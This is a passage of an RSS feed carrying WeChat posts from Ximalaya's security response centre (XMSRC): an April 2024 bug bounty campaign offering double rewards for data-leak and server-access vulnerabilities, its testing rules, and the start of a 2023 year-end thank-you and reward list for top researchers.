powered-by="xiumi.us"><section style="display: flex;flex-flow: row;text-align: center;justify-content: center;"><section style="display: inline-block;vertical-align: middle;width: 50px;flex: 0 0 auto;height: auto;align-self: center;"><section style="transform: perspective(0px);transform-style: flat;" powered-by="xiumi.us"><section style="margin-bottom: 10px;transform: translate3d(10px, 0px, 0px) rotateY(180deg);opacity: 1;line-height: 0;pointer-events: none;"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 50px;height: auto;pointer-events: none;"><img data-imgfileid="100000214" data-ratio="1.4266666666666667" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="gif" data-w="75" src="https://wechat2rss.xlab.app/img-proxy/?k=ae4cdf46&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5IWKVuykF1w7vkvH2GJMNlBERuxoYFMdd2mGocvOqEsgUcCXZVJ5Errg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;border-width: 0px;border-style: none;border-color: rgb(62, 62, 62);min-width: 10%;flex: 0 0 auto;height: auto;align-self: center;"><section style="display: flex;width: 100%;flex-flow: column;" powered-by="xiumi.us"><section style="z-index: 2;" powered-by="xiumi.us"><section style=""><section style="display: inline-block;width: 200px;height: 80px;vertical-align: top;overflow: hidden;background-position: 50% 50%;background-repeat: no-repeat;background-size: contain;background-attachment: scroll;background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/bNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5IHY1TrxNHuHk45CtS9cRDBmAtTE74Cibiaiau0aLx6t6893vNXuaUowpjw/640?wx_fmt=png&amp;from=appmsg&#34;);"><section style="margin-top: 25px;" powered-by="xiumi.us"><section style="font-size: 20px;color: rgb(255, 255, 255);letter-spacing: 2px;line-height: 1.2;font-family: FZHei-B01;text-shadow: rgb(104, 188, 234) 1px 1px 0px, rgb(104, 188, 234) 1px -1px 0px, rgb(104, 188, 234) -1px 1px 0px, rgb(104, 188, 234) -1px -1px 0px, rgb(104, 188, 234) 0px 1.4px 0px, rgb(104, 188, 234) 0px -1.4px 0px, rgb(104, 188, 234) -1.4px 0px 0px, rgb(104, 188, 234) 1.4px 0px 0px;"><p><span style="font-size: 24px;"><strong>活动规则</strong></span></p></section></section></section></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 60px;flex: 0 0 auto;align-self: center;height: auto;"><section style="text-align: left;margin-bottom: 8px;transform: translate3d(-15px, 0px, 0px);line-height: 0;pointer-events: none;" powered-by="xiumi.us"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;pointer-events: none;"><img data-imgfileid="100000213" data-ratio="1.4266666666666667" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="gif" data-w="75" src="https://wechat2rss.xlab.app/img-proxy/?k=ae4cdf46&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5IWKVuykF1w7vkvH2GJMNlBERuxoYFMdd2mGocvOqEsgUcCXZVJ5Errg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></section></section></section></section></section></section><section style="text-align: center;margin-top: 10px;margin-bottom: -10px;line-height: 0;pointer-events: none;" powered-by="xiumi.us"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 90%;height: auto;pointer-events: none;"><img data-imgfileid="100000212" data-ratio="0.16237113402061856" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="png" data-w="776" src="https://wechat2rss.xlab.app/img-proxy/?k=2573a54b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5IaIBI2CYqsHKmk1ADlrPdnNd5vH3mHr4dyNaUWxGZQ9siaY3bMoY6GIQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section></section><section style="text-align: center;justify-content: center;display: flex;flex-flow: row;" powered-by="xiumi.us"><section style="display: inline-block;width: 90%;vertical-align: top;flex: 0 0 auto;height: auto;border-style: none;border-width: 5px;border-color: rgb(181, 222, 255);background-color: rgb(255, 255, 255);align-self: flex-start;padding: 8px;"><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin-top: 10px;margin-bottom: 10px;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;height: auto;"><section style="transform: perspective(0px);transform-style: flat;" powered-by="xiumi.us"><section style="text-align: center;line-height: 0;transform: rotateY(180deg);"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 14px;height: auto;"><img class="rich_pages wxw-img" data-imgfileid="100000218" data-ratio="1.3692614770459082" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="png" data-w="501" src="https://wechat2rss.xlab.app/img-proxy/?k=0f4afc61&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5IuCR42m2ibBW0Yia36UfcLmWenkGo1mxPC3m0YT3DyNWIE6SvR56hNwyw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;height: auto;padding-left: 5px;"><section style="text-align: justify;font-size: 17px;color: rgb(56, 157, 213);" powered-by="xiumi.us"><p style="text-wrap: wrap;"><span style="font-size: 20px;"><strong>活动时间</strong></span></p></section></section><section style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;flex: 0 0 auto;height: auto;align-self: center;padding-left: 14px;"><section style="text-align: justify;font-size: 10px;color: rgb(114, 174, 255);" powered-by="xiumi.us"><p style="text-wrap: wrap;"><br/></p></section></section><section style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;padding-left: 11px;"><section style="margin-top: 0.5em;margin-bottom: 0.5em;" powered-by="xiumi.us"><section style="background-color: rgb(114, 174, 255);height: 1px;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="font-size: 14px;color: rgb(114, 113, 113);" powered-by="xiumi.us"><p><strong><span style="font-size: 16px;">2024.04.01-2024.04.30</span></strong><br/></p></section><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin-top: 10px;margin-bottom: 10px;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;height: auto;"><section style="transform: perspective(0px);transform-style: flat;" powered-by="xiumi.us"><section style="text-align: center;line-height: 0;transform: rotateY(180deg);"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 14px;height: auto;"><img data-imgfileid="100000217" data-ratio="1.3692614770459082" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="png" data-w="501" src="https://wechat2rss.xlab.app/img-proxy/?k=0f4afc61&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5IuCR42m2ibBW0Yia36UfcLmWenkGo1mxPC3m0YT3DyNWIE6SvR56hNwyw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;height: auto;padding-left: 5px;"><section style="text-align: justify;font-size: 17px;" powered-by="xiumi.us"><p style="text-wrap: wrap;"><span style="font-size: 20px;"><span style="font-size: 20px;color: rgb(56, 157, 213);"><strong>活动范围</strong></span><strong><br/></strong></span></p></section></section><section style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;flex: 0 0 auto;height: auto;align-self: center;padding-left: 14px;"><section style="text-align: justify;font-size: 10px;color: rgb(114, 174, 255);" powered-by="xiumi.us"><p style="text-wrap: wrap;"><br/></p></section></section><section style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;padding-left: 11px;"><section style="margin-top: 0.5em;margin-bottom: 0.5em;" powered-by="xiumi.us"><section style="background-color: rgb(114, 174, 255);height: 1px;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="text-align: justify;color: rgb(114, 113, 113);" powered-by="xiumi.us"><p style="text-wrap: wrap;">  1、<strong>用户敏感信息泄露</strong>，需包含三个或三个以上敏感信息字段。</p><p style="text-wrap: wrap;">  2、<strong>可获取服务器权限的漏洞</strong>，包括但不限于代码执行、远程<span style="color: rgb(114, 113, 113);font-size: 16px;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(255, 255, 255);">命令执行</span><span style="color: rgb(114, 113, 113);font-size: 16px;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(255, 255, 255);">、</span>可执行命令的sql注入等。<br/></p><p style="text-wrap: wrap;"><br/></p><p style="text-wrap: wrap;"><br/></p><p style="text-wrap: wrap;">    活动期间提交上述范围且被评为有效漏洞的，均可获得<strong>2倍</strong>安全币奖励(贡献值不翻倍)。<span style="font-size: 14px;"><br/></span></p><p style="text-wrap: wrap;"><span style="font-size: 14px;"><br/></span></p><p style="text-wrap: wrap;"><span style="font-size: 14px;">                 <strong>注:报告奖励为附加奖励不算在翻倍内</strong></span></p></section><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin-top: 10px;margin-bottom: 10px;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;height: auto;"><section style="transform: perspective(0px);transform-style: flat;" powered-by="xiumi.us"><section style="text-align: center;line-height: 0;transform: rotateY(180deg);"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 14px;height: auto;"><img class="rich_pages wxw-img" data-imgfileid="100000219" data-ratio="1.3692614770459082" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="png" data-w="501" src="https://wechat2rss.xlab.app/img-proxy/?k=0f4afc61&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5IuCR42m2ibBW0Yia36UfcLmWenkGo1mxPC3m0YT3DyNWIE6SvR56hNwyw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;height: auto;padding-left: 5px;"><section style="text-align: justify;font-size: 17px;color: rgb(56, 157, 213);" powered-by="xiumi.us"><p style="text-wrap: wrap;"><span style="font-size: 20px;"><strong>漏洞提交<br/></strong></span></p></section></section><section style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;flex: 0 0 auto;height: auto;align-self: center;padding-left: 14px;"><section style="text-align: justify;font-size: 10px;color: rgb(114, 174, 255);" powered-by="xiumi.us"><p style="text-wrap: wrap;"><br/></p></section></section><section style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;padding-left: 11px;"><section style="margin-top: 0.5em;margin-bottom: 0.5em;" powered-by="xiumi.us"><section style="background-color: rgb(114, 174, 255);height: 1px;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="text-align: justify;font-size: 14px;color: rgb(114, 113, 113);" powered-by="xiumi.us"><p style="text-wrap: wrap;">XMSRC官网：<a href="https://security.ximalaya.com" target="_blank">https://security.ximalaya.com</a></p></section></section></section><p style="text-wrap: wrap;" powered-by="xiumi.us"><br/></p><p style="text-wrap: wrap;" powered-by="xiumi.us"><br/></p><section style="text-align: center;justify-content: center;display: flex;flex-flow: row;" powered-by="xiumi.us"><section style="display: inline-block;width: 90%;vertical-align: top;flex: 0 0 auto;height: auto;border-width: 0px 0px 3px;border-style: none none solid;border-color: rgb(181, 222, 255) rgb(181, 222, 255) rgb(159, 211, 237);align-self: flex-start;background-color: rgb(255, 255, 255);"><section style="justify-content: center;margin-top: -20px;display: flex;flex-flow: row;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: top;width: 12%;border-width: 0px;flex: 0 0 auto;height: auto;align-self: flex-start;"><section style="" powered-by="xiumi.us"><section style="display: inline-block;width: 40px;height: 40px;vertical-align: top;overflow: hidden;border-radius: 100%;border-width: 2px;border-style: none;border-color: rgb(255, 255, 255);background-color: rgb(173, 222, 247);"><section style="margin-right: 0%;margin-left: 0%;" powered-by="xiumi.us"><section style="font-size: 20px;color: rgb(255, 255, 255);line-height: 2;"><p><span style="font-size: 24px;"><strong>更<br/></strong></span></p></section></section></section></section></section><section style="display: inline-block;vertical-align: top;width: 12%;flex: 0 0 auto;height: auto;align-self: flex-start;"><section style="" powered-by="xiumi.us"><section style="display: inline-block;width: 40px;height: 40px;vertical-align: top;overflow: hidden;border-radius: 100%;border-width: 2px;border-style: none;border-color: rgb(255, 255, 255);background-color: rgb(173, 222, 247);"><section style="margin-right: 0%;margin-left: 0%;" powered-by="xiumi.us"><section style="font-size: 20px;color: rgb(255, 255, 255);line-height: 2;"><p><span style="font-size: 24px;"><strong>多</strong><br/></span></p></section></section></section></section></section><section style="display: inline-block;vertical-align: top;width: 9%;flex: 0 0 auto;height: auto;border-width: 0px;align-self: flex-start;"><section style="font-size: 36px;color: rgb(162, 209, 255);line-height: 1;" powered-by="xiumi.us"><p><span style="font-size: 24px;"><strong>·</strong></span></p></section></section><section style="display: inline-block;vertical-align: top;width: 12%;flex: 0 0 auto;height: auto;align-self: flex-start;"><section style="" powered-by="xiumi.us"><section style="display: inline-block;width: 40px;height: 40px;vertical-align: top;overflow: hidden;border-radius: 100%;border-width: 2px;border-style: none;border-color: rgb(255, 255, 255);background-color: rgb(173, 222, 247);"><section style="margin-right: 0%;margin-left: 0%;" powered-by="xiumi.us"><section style="font-size: 20px;color: rgb(255, 255, 255);line-height: 2;"><p><span style="font-size: 24px;"><strong>事<br/></strong></span></p></section></section></section></section></section><section style="display: inline-block;vertical-align: top;width: 12%;flex: 0 0 auto;height: auto;align-self: flex-start;"><section style="" powered-by="xiumi.us"><section style="display: inline-block;width: 40px;height: 40px;vertical-align: top;overflow: hidden;border-radius: 100%;border-width: 2px;border-style: none;border-color: rgb(255, 255, 255);background-color: rgb(173, 222, 247);"><section style="margin-right: 0%;margin-left: 0%;" powered-by="xiumi.us"><section style="font-size: 20px;color: rgb(255, 255, 255);line-height: 2;"><p><span style="font-size: 24px;"><strong>项</strong></span><br/></p></section></section></section></section></section></section><section style="text-align: justify;" powered-by="xiumi.us"><p style="text-wrap: wrap;"><br/></p></section><section style="font-size: 14px;color: rgb(114, 113, 113);letter-spacing: 2px;line-height: 2;padding-right: 20px;padding-left: 20px;" powered-by="xiumi.us"><p>根据《喜马拉雅SRC漏洞处理规则及评分V3.0》中所规定的漏洞评级标准进行漏洞评级<br/></p></section><section style="text-align: justify;font-size: 15px;color: rgb(115, 115, 115);letter-spacing: 3px;line-height: 2;direction: ltr;" powered-by="xiumi.us"><p style="text-wrap: wrap;"><br/></p></section><section style="justify-content: center;display: flex;flex-flow: row;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: middle;width: 40px;flex: 0 0 auto;height: auto;align-self: center;"><section style="transform: perspective(0px);transform-style: flat;" powered-by="xiumi.us"><section style="transform: rotateX(180deg);line-height: 0;pointer-events: none;"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 66%;height: auto;pointer-events: none;"><img data-imgfileid="100000220" data-ratio="1.1956521739130435" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="gif" data-w="92" src="https://wechat2rss.xlab.app/img-proxy/?k=fbbb62af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5Iasvswx5XibCDKW3FJL63LFYpu2FkVSsQOYbB0ic5oYfFBXspyMIic9yvg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;background-color: rgba(222, 230, 249, 0.02);align-self: center;min-width: 10%;flex: 0 0 auto;height: auto;border-bottom: 5px solid rgb(229, 248, 255);border-bottom-right-radius: 0px;"><section style="font-size: 18px;color: rgb(159, 211, 237);line-height: 1;letter-spacing: 2px;padding-right: 5px;padding-left: 5px;" powered-by="xiumi.us"><p><span style="font-size: 20px;"><strong>注意事项</strong></span></p></section></section><section style="display: inline-block;vertical-align: middle;width: 40px;flex: 0 0 auto;height: auto;align-self: center;"><section style="transform: perspective(0px);transform-style: flat;" powered-by="xiumi.us"><section style="text-align: right;transform: rotateX(180deg) rotateY(180deg);line-height: 0;pointer-events: none;"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 66%;height: auto;pointer-events: none;"><img data-imgfileid="100000221" data-ratio="1.1956521739130435" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="gif" data-w="92" src="https://wechat2rss.xlab.app/img-proxy/?k=fbbb62af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5Iasvswx5XibCDKW3FJL63LFYpu2FkVSsQOYbB0ic5oYfFBXspyMIic9yvg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></section></section></section></section></section><section style="text-align: justify;" powered-by="xiumi.us"><p style="text-wrap: wrap;"><br/></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="color: rgb(114, 113, 113);text-align: left;text-wrap: wrap;"><span style="font-size: 14px;">禁止社会工程学、钓鱼等非技术性测试。</span></p></li><li><p style="color: rgb(114, 113, 113);text-align: left;text-wrap: wrap;"><span style="font-size: 14px;">禁止利用漏洞私自保存用户个人信息、网站源码等敏感数据。<br/></span></p></li><li><p style="color: rgb(114, 113, 113);text-align: left;text-wrap: wrap;"><span style="font-size: 14px;"><strong>发现可入侵漏洞后，需立即上报运营或邮件同步XMSRC获得授权，不得私自或未授权<strong style="color: rgb(114, 113, 113);font-size: 14px;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">对内网进行大量扫描</strong>、横向移动、植入后门等操作。</strong><br/></span></p></li><li><p style="color: rgb(114, 113, 113);text-align: left;text-wrap: wrap;"><span style="font-size: 14px;">禁止对网站后台和项目使用大规模扫描器。</span></p></li><li><p style="color: rgb(114, 113, 113);text-align: left;text-wrap: wrap;"><span style="font-size: 14px;">禁止进行可能引起业务异常运行的测试，例如:IIS的拒绝服务等可导致拒绝服务的漏洞测试以及DDOS攻击。</span></p></li><li><p style="color: rgb(114, 113, 113);text-align: left;text-wrap: wrap;"><span style="font-size: 14px;">对于一切违反测试规范的行为，XMSRC保留追究其法律责任的权利。</span></p></li><li><p style="color: rgb(114, 113, 113);text-align: left;text-wrap: wrap;"><span style="font-size: 14px;">活动解释权归我司所有。</span></p></li></ul><p style="color: rgb(114, 113, 113);text-align: left;text-wrap: wrap;"><span style="font-size: 14px;"><br/></span></p></section></section></section><p style="text-wrap: wrap;" powered-by="xiumi.us"><br/></p><section style="line-height: 0;text-align: center;" powered-by="xiumi.us"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 30%;height: auto;"><img class="rich_pages wxw-img" data-imgfileid="100000223" data-ratio="1" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="png" data-w="267" src="https://wechat2rss.xlab.app/img-proxy/?k=02f258bb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5INnbfOXUicROyrLFH1FzTdGXVibWibm7oRK4galFwpr7T6plce1Tbktuog%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section></section><section style="margin: 10px 0%;text-align: center;" powered-by="xiumi.us"><section style="font-size: 14px;color: rgb(132, 192, 250);"><p>扫码查看更多详情</p><p>官方邮箱：security@ximalaya.com</p></section></section><section style="text-align: center;margin-top: 10px;margin-bottom: -60px;line-height: 0;pointer-events: none;" powered-by="xiumi.us"><section style="vertical-align: middle;display: inline-block;line-height: 0;pointer-events: none;"><img data-imgfileid="100000225" data-ratio="0.245" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="gif" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=819ad7cb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5I90plVPwLH8IMsIicyFVLNOZhU1m5rY5eccyZvNNAN9Fboia1MshVD5CQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></section></section><section style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;pointer-events: none;" powered-by="xiumi.us"><section style="vertical-align: middle;display: inline-block;line-height: 0;pointer-events: none;"><img data-imgfileid="100000226" data-ratio="0.3370044052863436" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="gif" data-w="454" src="https://wechat2rss.xlab.app/img-proxy/?k=6b4c219a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5Io1k4Kc96ynuia3aDI4WfXy66toug8rho4DCC0jCic5BRX1eLzPlNDoLQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></section></section></section><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483878">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=bd0e651f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483878%26idx%3D1%26sn%3D5d9fccdc608e67d9547fbf1015f1e212%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 01 Apr 2024 15:13:00 +0800</pubDate>
    </item>
    <item>
      <title>2023年度XMSRC年终致谢公告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483859&amp;idx=1&amp;sn=70ce17d4a88a361c49d54219f7c459e7</link>
      <description>叮！您有一份年终奖请查收～</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2024-02-08 19:18</span> <span style="display: inline-block;">河南</span>
</p>

<p>叮！您有一份年终奖请查收～</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=f03a75d3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ibiczXHnfMvMGc1zjIM6zEbPctOUTEpQIib6WLY0JcKYSAFn2yicD23HvjXMlrniaLbSCAibdBMtqx8NJug%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;line-height: 1.6em;">   2023年圆满收官啦～</p><p style="text-align: center;line-height: 1.6em;">感谢各位白帽子及安全团队<span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">对喜</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">马安全</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">的</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">支持与关注</span></p><p style="text-align: center;line-height: 1.6em;">XMSRC向你们表示由衷的感谢！</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-imgfileid="100000203" data-ratio="1" data-s="300,640" style="width: 172px;height: 172px;" data-type="gif" data-w="240" src="https://wechat2rss.xlab.app/img-proxy/?k=0cc36706&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ibib4xicr5OA0zkmzHHAzuJutzaSdib7Ymibq82Ed9iceLd44ial4ID6KK6zM8UuDApAuG2Jwcb8ps6lDJgg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p><p style="text-align: center;line-height: 1.6em;">以下是2023年度上榜的TOP10师傅<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000178" data-ratio="1.3518518518518519" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3b0a3730&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib8hfF0GoXHowFXSSd2R4YFrMIdgWam9qoV3Kbv0zpZxhwqIgy4m04bAxWHO6r9ibvPvIFjhql7iciakQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section data-id="137107" data-tools="135编辑器"><section style="margin: 10px auto;display: flex;justify-content: center;"><section style="display: flex;align-items: flex-end;"><section style="display: flex;align-items: center;"><section style="padding-right: 3px;padding-left: 3px;"><section data-id="137024" data-tools="135编辑器"><section style="margin: 10px auto;"><section style="display: flex;align-items: center;margin-bottom: -15px;"><section style="width: 100%;display: flex;align-items: center;"><section style="width: 100%;border-top: 1px solid rgb(206, 168, 118);height: 1px;overflow: hidden;"><br/></section><section style="flex-shrink: 0;padding-right: 5px;padding-left: 10px;display: flex;align-items: center;"><section style="width: 8px;height: 8px;border-width: 1px;border-style: solid;border-color: rgb(205, 94, 45);transform: rotate(45deg);overflow: hidden;"><br/></section><section style="margin-left: -3px;"><section style="width: 8px;height: 8px;border-width: 1px;border-style: solid;border-color: rgb(205, 94, 45);transform: rotate(45deg);overflow: hidden;"><br/></section></section></section></section><section style="flex-shrink: 0;"><section style="display: flex;justify-content: flex-start;"><section style="font-size: 16px;color: rgb(255, 255, 255);background-color: rgb(205, 94, 45);width: 32px;height: 32px;border-radius: 100%;text-align: center;line-height: 32px;margin-right: 2px;margin-left: 2px;"><strong>年</strong></section><section style="font-size: 16px;color: rgb(255, 255, 255);background-color: rgb(205, 94, 45);width: 32px;height: 32px;border-radius: 100%;text-align: center;line-height: 32px;margin-right: 2px;margin-left: 2px;"><strong>终</strong></section><section style="font-size: 16px;color: rgb(255, 255, 255);background-color: rgb(205, 94, 45);width: 32px;height: 32px;border-radius: 100%;text-align: center;line-height: 32px;margin-right: 2px;margin-left: 2px;"><strong data-brushtype="text">奖<br/></strong></section><section style="font-size: 16px;color: rgb(255, 255, 255);background-color: rgb(205, 94, 45);width: 32px;height: 32px;border-radius: 100%;text-align: center;line-height: 32px;margin-right: 2px;margin-left: 2px;"><strong>励</strong></section><section style="font-size: 16px;color: rgb(255, 255, 255);background-color: rgb(205, 94, 45);width: 32px;height: 32px;border-radius: 100%;text-align: center;line-height: 32px;margin-right: 2px;margin-left: 2px;"><strong data-brushtype="text">规</strong></section><section style="font-size: 16px;color: rgb(255, 255, 255);background-color: rgb(205, 94, 45);width: 32px;height: 32px;border-radius: 100%;text-align: center;line-height: 32px;margin-right: 2px;margin-left: 2px;"><strong data-brushtype="text">则</strong></section></section></section><section style="width: 100%;display: flex;align-items: center;"><section style="flex-shrink: 0;padding-right: 10px;padding-left: 5px;display: flex;align-items: center;"><section style="width: 8px;height: 8px;border-width: 1px;border-style: solid;border-color: rgb(205, 94, 45);transform: rotate(45deg);overflow: hidden;"><br/></section><section style="margin-left: -3px;"><section style="width: 8px;height: 8px;border-width: 1px;border-style: solid;border-color: rgb(205, 94, 45);transform: rotate(45deg);overflow: hidden;"><br/></section></section></section><section style="width: 100%;border-top: 1px solid rgb(206, 168, 118);height: 1px;overflow: hidden;"><br/></section></section></section><section style="padding: 30px 25px 20px;border-right: 1px solid rgb(206, 168, 118);border-bottom: 1px solid rgb(206, 168, 118);border-left: 1px solid rgb(206, 168, 118);border-top: none;"><section data-autoskip="1" style="line-height: 1.75em;letter-spacing: 1.5px;font-size: 14px;color: rgb(51, 51, 51);"><p style="margin-bottom: 0px;color: rgb(106, 106, 106);letter-spacing: 0.578px;text-align: center;text-wrap: wrap;"><br/></p><p style="margin-bottom: 0px;color: rgb(106, 106, 106);letter-spacing: 0.578px;text-align: center;text-wrap: wrap;"><span style="color: rgb(217, 33, 66);"><strong><span style="font-size: 15px;">年度榜单第一                 5000元</span></strong></span></p><p style="margin-bottom: 0px;color: rgb(106, 106, 106);letter-spacing: 0.578px;text-align: center;text-wrap: wrap;"><span style="color: rgb(217, 33, 66);"><strong><span style="font-size: 15px;">年度榜单第二                 2000元</span></strong></span></p><p style="margin-bottom: 0px;color: rgb(106, 106, 106);letter-spacing: 0.578px;text-align: center;text-wrap: wrap;"><span style="color: rgb(217, 33, 66);"><strong><span style="font-size: 15px;">        年度榜单第三至第五           1000元</span></strong><span style="font-size: 15px;">  </span></span><span style="font-size: 15px;">            